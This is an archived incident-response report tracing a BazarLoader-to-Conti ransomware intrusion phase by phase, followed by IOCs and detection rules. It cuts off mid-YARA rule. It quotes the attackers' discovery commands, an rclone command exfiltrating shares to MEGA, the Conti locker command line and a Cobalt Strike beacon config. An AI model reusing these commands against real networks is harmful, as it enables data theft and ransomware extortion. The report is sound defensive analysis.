{ "id": "1ac05cc8-7eae-4110-b9f8-8c8762d99095", "created_at": "2026-04-06T00:06:59.424502Z", "updated_at": "2026-04-10T03:37:23.907431Z", "deleted_at": null, "sha1_hash": "64e1e4cdab99fefe919b03ea76f82364cd9d41b1", "title": "CONTInuing the Bazar Ransomware Story", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1658822, "plain_text": "CONTInuing the Bazar Ransomware Story\r\nBy editor\r\nPublished: 2021-11-29 · Archived: 2026-04-05 15:26:04 UTC\r\nIn this report we will discuss a case from early August where we witnessed threat actors utilizing BazarLoader and Cobalt\r\nStrike to accomplish their mission of encrypting systems with Conti ransomware.\r\nThe normal list of discovery tools were used during this case such as AdFind, Net, Ping, PowerView, and Nltest. Rclone was\r\nused to exfiltrate company data to Mega and Process Hacker was used to dump LSASS. The threat actors executed a Conti\r\nbatch file on a server which then encrypted most of the domain joined systems.\r\nCase Summary\r\nIn August, we witnessed an intrusion that started from a BazarLoader infection.  A Phishing campaign distributing\r\npassword-protected zip files with weaponized documents to victims was the likely delivery source. Macros inside the word\r\ndocument extracted and executed a malicious .HTA document, which downloaded and loaded the BazarLoader DLL in\r\nmemory.\r\nIt is now apparent to the information security community that intrusions starting with BazarLoader frequently end with\r\nConti ransomware. This case saw such a conclusion. There are some evident similarities in cases that involve Conti\r\nransomware. Ransomware operators’ tooling and overall tasks performed tend to match across the cluster. When we look at\r\nour earlier Conti case, this becomes noticeable. This could be due to the widely circulated Conti manual that was leaked by\r\nan affiliate. In this case, we saw the same pattern of events with tools like net, nltest, ShareFinder for discovery, Cobalt\r\nStrike for C2, and WMIC remote process creation for expanding their access within the network.\r\nEven though the intrusion lasted for five days total, Cobalt Strike and hands-on keyboard operators showed up in the first\r\ntwo hours of the intrusion. Straight away, they started gathering information to get the lay of the land using Net commands.\r\nThen they continued looking for open shares by executing the PowerView module, Invoke-ShareFinder.\r\nAfter collecting and dissecting the results from ShareFinder, they appeared to have a good understanding of the server and\r\nworkstation layout of the organization as they started executing commands to gather information from specific, high-value\r\nservers. During that time, we saw errors when operators failed to alter specific parameters that indicate the operator is acting\r\nfrom a pre-defined playbook. They eventually decided to pivot laterally to a server using WMIC to execute a DLL Cobalt\r\nStrike beacon.\r\nOnce they had access to the remote server via the Cobalt Strike beacon, they re-ran Invoke-ShareFinder and then exfiltrated\r\ndata of interest from a different server using the Rclone application via the MEGA cloud storage service.\r\nOn the second day, the threat actors used RDP to access the backup server and in doing so, reviewed the backup settings,\r\nand running processes on the server via the taskmanager GUI.\r\nOn day four, the threat actors returned and ran another round of exfiltration using Rclone and MEGA again.\r\nOn the fifth day, they moved fast towards their final objective, which was Conti ransomware. Before executing Conti, they\r\nused RDP to install and configure the AnyDesk remote desktop application. Having GUI access, they attempted to use\r\nProcessHacker to dump the LSASS process. After this last step, they deployed Conti ransomware via a batch script to all\r\ndomain joined systems.\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 1 of 27\n\nOne interesting fact about this case is that the threat actors were not seen interacting with the Domain Controllers (DCs).\r\nMost ransomware cases we see involve the threat actor executing code on the DCs.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt\r\nStrike, Metasploit, Empire, PoshC2, BazarLoader, etc. More information on this service and others can be found here.\r\nThe Cobalt Strike servers in this case were added to the Threat Feed on 5/20/21 and 08/03/21\r\nWe also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including\r\nSysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 2 of 27\n\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 3 of 27\n\nAnalysis and reporting completed by @Kostastsale, @pigerlin, and @_pete_0\r\nReviewed by @TheDFIRReport\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nThanks to @James_inthe_box for the sample!\r\nAs with previously documented intrusions, a weaponized Microsoft Word document is used to lure the user into enabling a\r\nmacro to execute the payload. The user is presented with the following:\r\nReviewing the file we can observe that the filetype while labeled as a .doc file appears as XML when reviewing the file\r\nattributes.\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 4 of 27\n\nA deeper inspection shows the Word 2003 XML formatting and the contained macro.\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 5 of 27\n\nOnce the macro has been enabled, in the next stage, an HTML Application (HTA) file is created and dropped into the user’s\r\nfolder:\r\nFollowed by the execution of the HTA:\r\nAnalysis of the HTA file shows a mix of encoded HTML and JavaScript/VBScript code, not to mention profanity at the start\r\nof the file.\r\nThe base64 encoded string can be decoded to:\r\nThe code downloads a binary file (compareForfor.jpg) masquerading as a JPG (Image file) from millscruelg[.]com to the\r\nfollowing folder “c:\\users\\public”, and incorporating VBScript code, utilizes REGSVR32 to execute this DLL.\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 6 of 27\n\nThis initiates a connection to 64.227.65[.]60:443 and invokes a Svchost.exe, followed by a lookup to myexternalip[.]com to\r\nretrieve the external public-facing IPv4 address of the network. The attacker could use this information to verify the network\r\nbeing targeted and/or to facilitate tool configuration. Two DLLs were loaded via RunDll32 using the Svchost process. The\r\nfirst was D574.dll:\r\nFollowed by D8B3.dll:\r\nD8B3.dll injected into the Winlogon process (high integrity):\r\nIn the case of D8B3.dll, the DLL was Go compiled. Both DLLs had invalid certificates and could be detected by checking\r\nfor any failed/revoked status.:\r\nAdditionally, each DLL had no populated metadata relating to the DLL:\r\nThe process hierarchy tree visualization below:\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 7 of 27\n\nThis is very similar to the Bazarloader analysis by Brad Duncan on 11/08/2021.\r\nPersistence\r\nWe observed the AnyDesk application created under the folder c:\\users\\\u003cREDACTED\u003e\\Videos’, an unusual location and\r\nsuspicious location for process activity – this is a good detection opportunity where portable executables appear on non-standard file system locations.\r\nAnyDesk is a closed source remote desktop application that is available for several operating systems. It is free for private\r\nuse. We observed a long connection initiated from the AnyDesk application towards legitimately registered IPv4 ranges.\r\nHowever, we did not observe many events of interest during these sessions.\r\nCredential Access\r\nProcessHacker was also dropped in the root of C:\\ and likely used to access the LSASS process. The use of utilities such as\r\nProcessHacker would be unusual for typical users, and applications from a C:\\ root would also be suspicious in certain\r\nenvironments.\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 8 of 27\n\nDiscovery\r\nUsing the RunDLL32 and Winlogon process, we observed many typical host and network discovery commands utilizing\r\nliving off the land techniques such as net, nltest, tasklist and time. Examples included:\r\ntasklist /s \u003cREDACTED\u003e\r\nnet group \"domain admins\" /dom\r\nnet localgroup \"administrator\"\r\nnltest /domain_trusts /all_trusts\r\nnet view /all /domain\r\nnet view /all time\r\nping\r\nWhile running some of these commands, copy paste errors were present indicating the operator is likely working from a\r\nrunbook, like the leaked Conti manual from August as seen via the tasklist /s ip rather than the actual host systems IP’s and\r\nseen right after this mistake.\r\nCmd.exe process invoked a lot of the commands with unusual parent processes such as RunDLL32.exe. The example below\r\nusing the time command:\r\nRed Canary provides a good detection guide for RunDLL32; this covers unusual RunDLL32 activity such as command less,\r\nunusual spawned activity, etc.\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 9 of 27\n\nDiscovery command invocation:\r\nAdFind was observed via a file write for the binary, but there was no evidence of execution.\r\nFile share enumeration was achieved using the PowerShell Invoke-ShareFinder script, part of PowerView.\r\nThe output file was created at c:\\ProgramData\\found_shares.txt. The use of this tool has been observed in other recent\r\nintrusions. PowerShell was invoked by the WinLogon process and the resulting file created by Rundll32.exe\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 10 of 27\n\nOn the second day of the intrusion, the threat actors accessed the backup server via RDP via the Cobalt Strike beacon and\r\nopened up the back up console on their server.\r\nAfter reviewing the backups, they also opened taskmanager via the GUI (indicated by the /4 in the process command line) to\r\nreview the running processes on the system.\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 11 of 27\n\nLateral Movement\r\nA Cobalt Strike beacon was executed on a critical asset (backup host in this intrusion) within the network using the\r\nfollowing command:\r\nRemote process execution achieved using WMI invoking Rundll32 to load the 143.dll (Cobalt Strike beacon) on the target\r\nhost:\r\nThe Cobalt Strike beacon (143.dll) injected into the svchost process ‘svchost.exe -k UnistackSvcGroup -s CDPUserSvc’:\r\nFollowed by a request to checkauj[.]com (82.117.252.143). Approximately 9 hours later, the attacker established an RDP\r\nsession via the 143.dll. This was achieved very early in the intrusion, and we were able to correlate the activity:\r\nDuring this event, we believe that the attacker disclosed the remote workstation name ‘win-344vu98d3ru’.\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 12 of 27\n\nCommand and Control\r\nThe Bazar DLL masquerading as a jpg made use of HTTPS C2 throughout the full length of the intrusion.\r\nBazar C2\r\n64.227.65.60:443\r\nJA3:72a589da586844d7f0818ce684948eea\r\nJA3s:ec74a5c51106f0419184d0dd08fb05bc\r\nCertificate: [7f:d6:df:4d:5e:c4:d9:71:c0:46:8d:47:e5:81:75:57:d6:92:72:96 ]\r\nNot Before: 2021/08/03 07:37:28 UTC\r\nNot After: 2022/08/03 07:37:28 UTC\r\nIssuer Org: GG EST\r\nSubject Common: perdefue.fr\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 13 of 27\n\nSubject Org: GG EST\r\nPublic Algorithm: rsaEncryption\r\n161.35.147.110:443\r\nJA3:72a589da586844d7f0818ce684948eea\r\nJA3s:ec74a5c51106f0419184d0dd08fb05bc\r\nCertificate: [21:ff:9f:e0:8a:dd:c3:ed:36:90:a0:e1:11:70:fe:c4:b3:42:f5:1a ]\r\nNot Before: 2021/08/03 07:37:30 UTC\r\nNot After: 2022/08/03 07:37:30 UTC\r\nIssuer Org: GG EST\r\nSubject Common: perdefue.fr\r\nSubject Org: GG EST\r\nPublic Algorithm: rsaEncryption\r\n161.35.155.92:443\r\nJA3:72a589da586844d7f0818ce684948eea\r\nJA3s:ec74a5c51106f0419184d0dd08fb05bc\r\nCertificate: [42:7d:a4:48:5b:6b:2b:92:2c:07:9d:cc:59:14:2e:de:b1:e8:f5:bb ]\r\nNot Before: 2021/08/03 07:37:30 UTC\r\nNot After: 2022/08/03 07:37:30 UTC\r\nIssuer Org: GG EST\r\nSubject Common: perdefue.fr\r\nSubject Org: GG EST\r\nPublic Algorithm: rsaEncryption\r\n64.227.69.92:443\r\nJA3:72a589da586844d7f0818ce684948eea\r\nJA3s:ec74a5c51106f0419184d0dd08fb05bc\r\nCertificate: [97:33:eb:80:85:ae:f0:0e:40:94:ac:d5:38:96:6a:e5:75:2b:49:8c ]\r\nNot Before: 2021/08/03 07:37:28 UTC\r\nNot After: 2022/08/03 07:37:28 UTC\r\nIssuer Org: GG EST\r\nSubject Common: perdefue.fr\r\nSubject Org: GG EST\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike\r\nThe first DLL [D574.dll] didn’t produce any immediate follow on activity, whereas D8B3.dll was loaded by RunDll32 and\r\nassociated with many activities, from file creation, process execution and persistent network connectivity to\r\n82.117.252[.]143:443 throughout the intrusion.\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 14 of 27\n\nD574.dll loaded by RunDll32 process with persistent DNS query activity to volga.azureedge[.]net, but no established\r\nnetwork connectivity.\r\nWe observed that the DLL payload “D574.dll” had issues contacting the domain volga.azureedge[.]net and C2 server via\r\nDNS 9003 response codes.\r\nExternal sandboxes show the domain tied to other Cobalt Strike beacon samples not associated with this report, it is likely\r\nthe server was taken down by this time.\r\nhttps://tria.ge/210803-w15fxk72ns\r\nhttps://capesandbox.com/analysis/175977/\r\nD8B3.dll illustrates initial activity, followed by established network connectivity to 82.117.252[.]143:80.\r\nD8B3.dll was the Cobalt Strike beacon the attackers used throughout the intrusion. It was the main payload to facilitate the\r\nbulk of the initial intrusion and ongoing activities to maintain access. The DLL 143.dll used in lateral movement from the\r\nbeachhead host to the backup server also communicated to this Cobalt Strike server. Once the attackers gained a foothold\r\nand pivoted laterally, they were able to switch to using RDP and access specific hosts of interest.\r\nfive.azureedge.net 82.117.252.143:80\r\ncheckauj.com 82.117.252.143:443\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [68:c5:fc:c0:4a:34:e4:8f:01:86:59:c1:da:40:78:00:00:20:a0:b0 ]\r\nNot Before: 2021/08/03 11:50:47 UTC\r\nNot After: 2021/11/01 11:50:45 UTC\r\nIssuer Org: Let's Encrypt\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 15 of 27\n\nSubject Common: checkauj.com [checkauj.com ,www.checkauj.com ]\r\nPublic Algorithmrsa:Encryption\r\nCobalt Strike Config\r\n82.117.252.143 – checkauj.com\r\n{\r\n \"BeaconType\": [\r\n \"HTTP\"\r\n ],\r\n \"Port\": 80,\r\n \"SleepTime\": 60000,\r\n \"MaxGetSize\": 1403644,\r\n \"Jitter\": 37,\r\n \"C2Server\": \"checkauj.com,/jquery-3.3.1.min.js\",\r\n \"HttpPostUri\": \"/jquery-3.3.2.min.js\",\r\n \"Malleable_C2_Instructions\": [\r\n \"Remove 1522 bytes from the end\",\r\n \"Remove 84 bytes from the beginning\",\r\n \"Remove 3931 bytes from the beginning\",\r\n \"Base64 URL-safe decode\",\r\n \"XOR mask w/ random key\"\r\n ],\r\n \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"HttpGet_Verb\": \"GET\",\r\n \"HttpPost_Verb\": \"POST\",\r\n \"HttpPostChunk\": 0,\r\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"CryptoScheme\": 0,\r\n \"Proxy_Behavior\": \"Use IE settings\",\r\n \"Watermark\": 0,\r\n \"bStageCleanup\": \"True\",\r\n \"bCFGCaution\": \"False\",\r\n \"KillDate\": 0,\r\n \"bProcInject_StartRWX\": \"True\",\r\n \"bProcInject_UseRWX\": \"False\",\r\n \"bProcInject_MinAllocSize\": 17500,\r\n \"ProcInject_PrependAppend_x86\": [\r\n \"kJA=\",\r\n \"Empty\"\r\n ],\r\n \"ProcInject_PrependAppend_x64\": [\r\n \"kJA=\",\r\n \"Empty\"\r\n ],\r\n \"ProcInject_Execute\": [\r\n \"CreateThread\",\r\n \"SetThreadContext\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 16 of 27\n\n],\r\n \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n \"bUsesCookies\": \"True\",\r\n \"HostHeader\": \"\"}\r\nExfiltration\r\nOnce the attackers established access to critical assets, they used RClone to exfiltrate sensitive data to a cloud storage space\r\nnamed MEGA. The full command used by Rclone includes a variety of parameters, including setting the bandwidth limit.\r\nrclone.exe copy --max-age 2y \"\\\\SERVER\\Shares\" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --\r\nThe use of RClone continues to be an effective tool for bulk data exfiltration. NCC Group has provided a detailed write-up\r\nof the Rclone application and detection methods.\r\nThe Rclone activity was observed on two separate instances, each lasting around three hours and occurring between 1900\r\nand 2200 UTC.\r\nImpact\r\nOn the fifth day, the threat actors moved to their final actions to encrypt the domain. They first pinged systems across the\r\nnetwork via an interactive command shell. Iobit unlocker was also dropped during this phase but we did not see it used.\r\nAfter pinging systems, the threat actors opened a batch file that was ultimately used to launch the Conti ransomware.\r\nThe locker.bat is a bespoke script designed to encrypt files across a number of hosts:\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 17 of 27\n\nBased on the contents of the file we can assess that the actors were likely making last minute adjustments before executing\r\nthe ransomware based on the ping results.\r\nThe ransom was then launched via the backup server.\r\nTo encrypt systems the ransomware mounted the C$ dir for each target host and then performed its encryption routine.\r\nC:\\o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe -m -net -size 10 -nomutex -p \\\\\r\nHere’s an overview of the execution:\r\nAnalysis of the DLLs accompanying the EXE indicates Conti artifacts:\r\nOnce the encryption was completed, the following ransomware note dropped in all affected directories as ‘readme.txt’\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 18 of 27\n\nThe content of these text files:\r\nFollowing the execution of the locker ransomware, the attacker then conducted a file listing discovery against multiple hosts\r\n– likely to validate and assess that the locker encryption was successful:\r\nIOCs\r\nNetwork\r\nBazarLoader\r\n64.227.69.92|443\r\n161.35.155.92|443\r\n161.35.147.110|443\r\n64.227.65.60|443\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 19 of 27\n\nLoader download\r\nmillscruelg.com\r\n45.95.11.133|80\r\nCobalt Strike\r\nvolga.azureedge.net\r\nfive.azureedge.net\r\ncheckauj.com\r\n82.117.252.143|443\r\n82.117.252.143|80\r\nFiles\r\ndecree-08.03.2021.doc\r\nf6f72e3d91f7b53dd75e347889a793da\r\n5d4f020115a483e9e5aa9778c038466f9014c90c\r\n14bccfecaaec8353e3e8f090ec1d3e9c87eb8ceb2a7abedfc47c3c980da8ad71\r\ncompareForFor.hta\r\n193b84d45dd371c6e4a501333d37349b\r\n742ed8d0202aafba1c162537087a8a131cb85cde\r\nfb38061bf601001c45aafe8d0c5feaa22c607d2ff79cfb841788519ca55a17b4\r\nD8B3.dll\r\n4ba6791f2293a8bc2dfa537015829b3c\r\nd4f5cc55b6fa25f9a45ba7e968438b97e33aefbc\r\n4a49cf7539f9fd5cc066dc493bf16598a38a75f7b656224db1ddd33005ad76f6\r\nD574.dll\r\n663c8d0fe8b770b50792d10f6c07a652\r\nd0361fbcebe59205b2ea6a31041c89464a5e61b6\r\n1872bf6c974e9b11040851f7d30e5326afdc8b13802891c222af4368a14f829c\r\n143.dll\r\nab3a744545a12ba2f6789e94b789666a\r\n1d5f8d283ed3f6019954aa480182c9913ee49735\r\n6f844a6e903aa8e305e88ac0f60328c184f71a4bfbe93124981d6a4308b14610\r\nProcessHacker.exe\r\n68f9b52895f4d34e74112f3129b3b00d\r\nc5e2018bf7c0f314fed4fd7fe7e69fa2e648359e\r\nd4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f\r\nlocker.bat\r\n84361813423910294079d0bc5b6daba2\r\nc0b28fd2d5b62d5129225e8c45d368bc9e9fd415\r\n1edfae602f195d53b63707fe117e9c47e1925722533be43909a5d594e1ef63d3\r\no4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe\r\n7f112bfa16a6bd344aaed28abf606780\r\neaa792a1c9f1d277af3d88bd9ea17a33275308f3\r\n9cd3c0cff6f3ecb31c7d6bc531395ccfd374bcd257c3c463ac528703ae2b0219\r\no4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64.dll\r\n2c313c5b532c905eb8f1748a0d656ff9\r\n70725329e4c14b39d49db349f3c84e055c111f2d\r\n31656dcea4da01879e80dff59a1af60ca09c951fe5fc7e291be611c4eadd932a\r\no4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86.dll\r\n26bd89afd5c1ba9803422d33185cef89\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 20 of 27\n\nc99f0fa8d5fbffe5288aaff84dbe980c412ba34e\r\n01a9549c015cfcbff4a830cea7df6386dc5474fd433f15a6944b834551a2b4c9\r\nAnyDesk.exe\r\ne6c3ab2ee9a613efdf995043b140fd8e\r\n33738cf695a6ac03675fe925d62ecb529ac73d03\r\n8f09c538fc587b882eecd9cfb869c363581c2c646d8c32a2f7c1ff3763dcb4e7\r\nunlocker.exe\r\n5840aa36b70b7c03c25e5e1266c5835b\r\nea031940b2120551a6abbe125eb0536b9e4f14c8\r\n09d7fcbf95e66b242ff5d7bc76e4d2c912462c8c344cb2b90070a38d27aaef53\r\nrclone.exe\r\n9066cfcf809bb19091509a4d0f15f092\r\nf88a948b0fd137d4b14cf5aec0c08066cb07e08d\r\n9b5d1f6a94ce122671a5956b2016e879428c74964174739b68397b6384f6ee8b\r\nSuricata\r\nET TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile Response\r\nETPRO TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile M2\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET USER_AGENTS AnyDesk Remote Desktop Software User-Agent\r\nET POLICY HTTP POST to MEGA Userstorage\r\nSigma\r\nrclone_execution.yaml\r\nsysmon_in_memory_powershell.yml\r\nwin_susp_wmic_proc_create_rundll32.yml\r\nsysmon_abusing_debug_privilege.yml\r\nwin_trust_discovery.yml\r\nwin_office_shell.yml\r\nwin_mshta_spawn_shell.yml\r\nwin_susp_net_execution.yml\r\nwin_susp_regsvr32_anomalies.yml\r\nsysmon_rundll32_net_connections.yml\r\nwin_net_enum.yml\r\nwin_susp_wmi_execution.yml\r\nYara\r\n/*\r\n YARA Rule Set\r\n Author: TheDFIRReport\r\n Date: 2021-11-29\r\n Identifier: 5794\r\n */\r\n/* Rule Set ----------------------------------------------------------------- */\r\nrule mal_host2_143 {\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 21 of 27\n\nmeta:\r\n description = \"mal - file 143.dll\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-11-29\"\r\n hash1 = \"6f844a6e903aa8e305e88ac0f60328c184f71a4bfbe93124981d6a4308b14610\"\r\n strings:\r\n $x1 = \"object is remotepacer: H_m_prev=reflect mismatchremote I/O errorruntime: g: g=runtime: addr = runtime: base\r\n $x2 = \"slice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds no\r\n $x3 = \" to unallocated spanCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWGetAcceptExSockaddrsGetCurren\r\n $x4 = \"Go pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryr\r\n $x5 = \"GetAddrInfoWGetLastErrorGetLengthSidGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOfFileTransmitFilea\r\n $x6 = \"lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not r\r\n $x7 = \"unknown pcws2_32.dll of size (targetpc= KiB work, freeindex= gcwaiting= heap_live= idleprocs= in status\r\n $x8 = \"file descriptor in bad statefindrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not\r\n $x9 = \".lib section in a.out corruptedbad write barrier buffer boundscall from within the Go runtimecannot assign re\r\n $x10 = \"Ptrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad\r\n $x11 = \"entersyscallgcBitsArenasgcpacertracehost is downillegal seekinvalid slotiphlpapi.dllkernel32.dlllfstack.push\r\n $x12 = \"ollectionidentifier removedindex out of rangeinput/output errormultihop attemptedno child processesno locks\r\n $s13 = \"y failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typ\r\n $s14 = \"ddetailsecur32.dllshell32.dlltracealloc(unreachableuserenv.dll KiB total, [recovered] allocCount found at\r\n $s15 = \".dllbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend trac\r\n $s16 = \"ked to threadCommandLineToArgvWCreateFileMappingWGetExitCodeProcessGetFileAttributesWLookupAccountNameWRFS s\r\n $s17 = \"mstartbad sequence numberdevice not a streamdirectory not emptydisk quota exceededdodeltimer: wrong Pfile al\r\n $s18 = \"structure needs cleaning bytes failed with errno= to unused region of spanGODEBUG: can not enable \\\"GetQueue\r\n $s19 = \"garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m-\u003elocke\r\n $s20 = \"tProcessIdGetSystemDirectoryWGetTokenInformationWaitForSingleObjectadjusttimers: bad pbad file descriptorbad\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 4000KB and\r\n 1 of ($x*) and all of them\r\n}\r\nrule mal_host1_D8B3 {\r\n meta:\r\n description = \"mal - file D8B3.dll\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-11-29\"\r\n hash1 = \"4a49cf7539f9fd5cc066dc493bf16598a38a75f7b656224db1ddd33005ad76f6\"\r\n strings:\r\n $x1 = \"object is remotepacer: H_m_prev=reflect mismatchremote I/O errorruntime: g: g=runtime: addr = runtime: base\r\n $x2 = \"slice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds no\r\n $x3 = \" to unallocated spanCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWGetAcceptExSockaddrsGetCurren\r\n $x4 = \"Go pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryr\r\n $x5 = \"GetAddrInfoWGetLastErrorGetLengthSidGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOfFileTransmitFilea\r\n $x6 = \"lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not r\r\n $x7 = \"unknown pcws2_32.dll of size (targetpc= KiB work, freeindex= gcwaiting= heap_live= idleprocs= in status\r\n $x8 = \"file descriptor in bad statefindrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not\r\n $x9 = \".lib section in a.out corruptedbad write barrier buffer boundscall from within the Go runtimecannot assign re\r\n $x10 = \"Ptrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad\r\n $x11 = \"entersyscallgcBitsArenasgcpacertracehost is downillegal seekinvalid slotiphlpapi.dllkernel32.dlllfstack.push\r\n $x12 = \"ollectionidentifier removedindex out of rangeinput/output errormultihop attemptedno child processesno locks\r\n $s13 = \"y failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typ\r\n $s14 = \"ddetailsecur32.dllshell32.dlltracealloc(unreachableuserenv.dll KiB total, [recovered] allocCount found at\r\n $s15 = \".dllbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend trac\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 22 of 27\n\n$s16 = \"ked to threadCommandLineToArgvWCreateFileMappingWGetExitCodeProcessGetFileAttributesWLookupAccountNameWRFS s\r\n $s17 = \"mstartbad sequence numberdevice not a streamdirectory not emptydisk quota exceededdodeltimer: wrong Pfile al\r\n $s18 = \"structure needs cleaning bytes failed with errno= to unused region of spanGODEBUG: can not enable \\\"GetQueue\r\n $s19 = \"garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m-\u003elocke\r\n $s20 = \"tProcessIdGetSystemDirectoryWGetTokenInformationWaitForSingleObjectadjusttimers: bad pbad file descriptorbad\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 4000KB and\r\n 1 of ($x*) and all of them\r\n}\r\nrule mal_host2_AnyDesk {\r\n meta:\r\n description = \"mal - file AnyDesk.exe\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-11-29\"\r\n hash1 = \"8f09c538fc587b882eecd9cfb869c363581c2c646d8c32a2f7c1ff3763dcb4e7\"\r\n strings:\r\n $x1 = \"\u003cassemblyIdentity type=\\\"win32\\\" name=\\\"Microsoft.Windows.Common-Controls\\\" version=\\\"6.0.0.0\\\" processorArch\r\n $x2 = \"C:\\\\Buildbot\\\\ad-windows-32\\\\build\\\\release\\\\app-32\\\\win_loader\\\\AnyDesk.pdb\" fullword ascii\r\n $s3 = \"\u003cassemblyIdentity type=\\\"win32\\\" name=\\\"Microsoft.Windows.Common-Controls\\\" version=\\\"6.0.0.0\\\" processorArch\r\n $s4 = \"\u003cassemblyIdentity version=\\\"6.3.2.0\\\" processorArchitecture=\\\"x86\\\" name=\\\"AnyDesk.AnyDesk.AnyDesk\\\" type=\\\"w\r\n $s5 = \"4http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O\" fullword ascii\r\n $s6 = \"(Symantec SHA256 TimeStamping Signer - G3\" fullword ascii\r\n $s7 = \"(Symantec SHA256 TimeStamping Signer - G30\" fullword ascii\r\n $s8 = \"http://ocsp.digicert.com0N\" fullword ascii\r\n $s9 = \"http://www.digicert.com/CPS0\" fullword ascii\r\n $s10 = \"Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0\" fullword ascii\r\n $s11 = \"\u003cdescription\u003eAnyDesk screen sharing and remote control software.\u003c/description\u003e\" fullword ascii\r\n $s12 = \"/http://crl3.digicert.com/sha2-assured-cs-g1.crl05\" fullword ascii\r\n $s13 = \"/http://crl4.digicert.com/sha2-assured-cs-g1.crl0L\" fullword ascii\r\n $s14 = \"%jgmRhZl%\" fullword ascii\r\n $s15 = \"5ZW:\\\"Wfh\" fullword ascii\r\n $s16 = \"5HRe:\\\\\" fullword ascii\r\n $s17 = \"ysN.JTf\" fullword 